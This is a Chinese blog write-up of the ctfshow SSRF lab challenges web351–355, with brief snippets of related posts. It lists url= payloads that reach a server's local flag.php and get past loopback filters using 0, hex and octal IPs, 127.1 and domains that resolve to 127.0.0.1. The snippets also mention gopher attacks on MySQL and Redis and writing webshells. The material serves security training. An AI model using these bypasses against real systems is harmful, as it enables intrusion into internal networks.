ctfshow web入门 ssrf web351-355

于 2023-05-10 14:13:07 发布
阅读量1k 收藏
点赞数
分类专栏: ctfshow通关 文章标签: web3 php 开发语言 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130574168
版权

1.web351

在这里插入图片描述
尝试访问本机的flag.php

payload:

url=http://localhost/flag.php
url=http://127.0.0.1/flag.php

2.web352

在这里插入图片描述
必须要用http或https,ip没有过滤因为匹配时没加变量,恒为真
payload:

url=http://127.0.0.1/flag.php
url=http://localhost/flag.php

3.web352

在这里插入图片描述
必须要用http或https,过滤了127.0.,只要匹配到了127.0.就不能继续执行了
windows 0代表0.0.0.0
linux 0代表 127.0.0.1
可以用0代替127.0.0.1
payload:

url=http://0/flag.php                #特殊0绕过
url=http://0.0.0.0/flag.php     #特殊0绕过
url=url=http://0x7F000001/flag.php   #进制绕过
http://0177.0.0.1/flag.php                   #进制绕过
http://127.1/flag.php                 #简写绕过

4.web354

在这里插入图片描述
过滤了0和1,可以把域名解析到127.0.0.1
http://safe.taobao.com/
http://114.taobao.com/
http://wifi.aliyun.com/
http://imis.qq.com/
http://localhost.sec.qq.com/
http://ecd.tencent.com/
http://sudo.cc/

url=http://sudo.cc/flag.php

5.web355

在这里插入图片描述
对ip长度做了限制
payload:

url=http://0/flag.php
url=http://127.1/flag.php

参考文章:
ssrf

mushangqiujin
关注
专栏目录
CTFshow SSRF(web351-360)
Kradress的博客
03-17 687
表示不允许私有IP地址(例如,10.0.0.0/8,172.16.0.0/12和192.168.0.0/16),而。后面要进行url编码,因为curl还会进行一次url解码。后面要进行url编码,因为curl还会进行一次url解码。显示网页内容,说明存在SSRF漏洞,那应该就是用。因为不能用私网,所以这题还是可以用。题目hint:打无密码的mysql。发现是一个登录框,抓个包看看,输入。,用于过滤和验证输入的IP地址。,这里可以用进制转换绕过。的返回结果,直接写马。的返回结果,直接写马。
ctfshow web入门ssrf
xiaolong22333的博客
04-28 1004
其实刚接触时做过一遍,现在再做一遍巩固一下知识点 文章目录web351web352web353web354web355web356web357 web351 <?php error_reporting(0); highlight_file(__FILE__); $url=$_POST['url']; $ch=curl_init($url); curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1.
ctfshow-web351(SSRF)
m0_62094846的博客
06-27 239
flag存在于flag.php中,但是不能用当前的网址,试试本地网址(127.0.0.1)
ctfshowSSRF漏洞Web351-352
m0_62584974的博客
04-13 1111
SRF漏洞简介 SSRF意为服务端请求伪造(ServerSideRequestForge)。攻击者利用SSRF漏洞通过服务器发起伪造请求,这样就可以访问内网的数据,进行内网信息探测或者内网漏洞利用。 SSRF漏洞形成的原因是:应用程序存在可以从其他服务器获取数据的功能,但是对服务器的地址并没有做严格的过滤,导致应用程序可以访问任意的URL链接。攻击者通过精心构造URL链接 可以利用SSRF漏洞进行以下攻击: (1)通过服务器获取内网主机、端口和banner信息。 (2)对内网的应用程序进行攻击,例如...
ctfshow SSRF web351~360
shinygod的博客
09-25 1315
SSRF练习和学习
web入门351~360
pandasaymmm的博客
03-08 156
web入门351~360
【CTFSHOW】web入门SSRF
7ruth0hn的博客
06-21 1183
CTFSHOW web入门SSRF 发现学习渗透和ctf对xss,ssrf,csrf,ssti都有挺高要求的,一直没怎么系统刷过题。今天学习学习,补补之前落下的债(* ̄3 ̄)╭ web351 扫描网站发现存在flag.php文件,通过分析和测试发现需要服务器本地访问,故使用传入127.0.0.1/flag.php web352 payload: web353 过滤代码: if($x['scheme']==='http'||$x['scheme']==='https'){ if(!preg_
CTFSHOW-WEB入门代码审计篇
Re_ly0n的博客
11-02 489
web301 漏洞点checklogin.php $sql="select sds_password from sds_user where sds_username='".$username."' order by id limit 1;"; sqlmap一把梭出来账号密码登录拿到flag web302 更改部分 if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ sqlmap跑出来账号密码却不知为何无法登录,然后尝试写
ctfshow web入门 代码审计
最新发布
12-10
CTF比赛中的Web入门题目通常是一些简单的Web应用程序,可以通过代码审计来发现漏洞并获取flag。 以下是一些常见的Web漏洞和审计技巧: 1. SQL注入:通过构造恶意的SQL语句来绕过应用程序的身份验证和访问控制。...
ctfshow web入门 序列化
Lumos427的博客
02-25 1544
序列化和反序列化 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=false; public function checkVip(){ return $this-&gt
【CTFshow】SSRF web351-360wp
weixin_51614272的博客
03-06 458
目录web351、352、353 、355、356web354、357web358web359、360 具体解析请查看这里:点击此处 web351、352、353 、355、356 url=http://0/flag.php url=http://0.0.0.0/flag.php url=http://127.1/flag.php url=http://2130706433/flag.php url=http://017700000001/flag.php url=http://0b111111100000
ctfshow web入门 ssrf web351~web360
qq_62989306的博客
09-13 1148
ssrf之127.0.0.1绕过、域名指向、302跳转、DNS重定向、gopher打mysql、redis……
ctfshow-web352,353(SSRF)
m0_62094846的博客
06-27 298
一定要出现http或者https不能出现localhost和127.0.0.1但是(1)127.1可以被解析成127.0.0.1 (2)在Linux中,也会被解析成是一个环回地址网段,从都表示localhost(4)ip地址还可以通过表示成其他进制的形式访问IP地址进制转换 (520101.com) (这题只有十进制有用)......
SSRF基础以及ctf.show的SSRF(web351-web360)
wanan的博客
09-30 584
SSRF基础以及ctf.show的SSRF(web351-web360)
ctfshow-web355,356(SSRF)
m0_62094846的博客
06-28 270
host长度小于5,即127.0.0.1要小于5,可以写成127.1或0
CTFshow刷题日记-WEB-SSRF(web351-360)SSRF总结
Love&Share
09-28 6325
SSRF基础 SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统) 相关函数和类 file_get_contents():将整个文件或一个url所指向的文件读入一个字符串中 readfile():输出一个文件的内容 fsockopen():打开一个网络连接或者一个Unix 套接字连接
CTFshow-WEB入门-SSRF
feng的博客
02-18 1586
前言 开始学习SSRF,学习文章: SSRF 学习记录(需要fq) 比较简单的题目就直接放payload了,不做解释。 web351 url=http://127.0.0.1/flag.php web352 scheme必须是http或者https,但是不能有127.0.0.1或者localhost。这个绕过技巧很多了,列具一些常用的吧: 进制绕过 url=http://0x7F000001/flag.php 0.0.0.0绕过 url=http://0.0.0.0/flag.php 短标签绕过,但是这
ctfshow JWT (Web345-350)
weixin_63231007的博客
11-08 1903
用户登录成功后,服务端生成一个随机token给用户,并且在服务端(数据库或缓存)中保存一份token,以后用户再来访问时需携带token,服务端接收到token之后,去数据库或缓存中进行校验token的是否超时、是否合法。用户登录成功后,服务端通过jwt生成一个随机token给用户(服务端无需保留token),以后用户再来访问时需携带token,服务端接收到token之后,通过jwt对token进行校验是否超时、是否合法。执行得到 构造好的JWT,放入cookie中POST发包,得到flag。
ctfshow [web] SSRF 351--355
weixin_68906365的博客
02-21 152
ctfshow SSRF 351--355
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值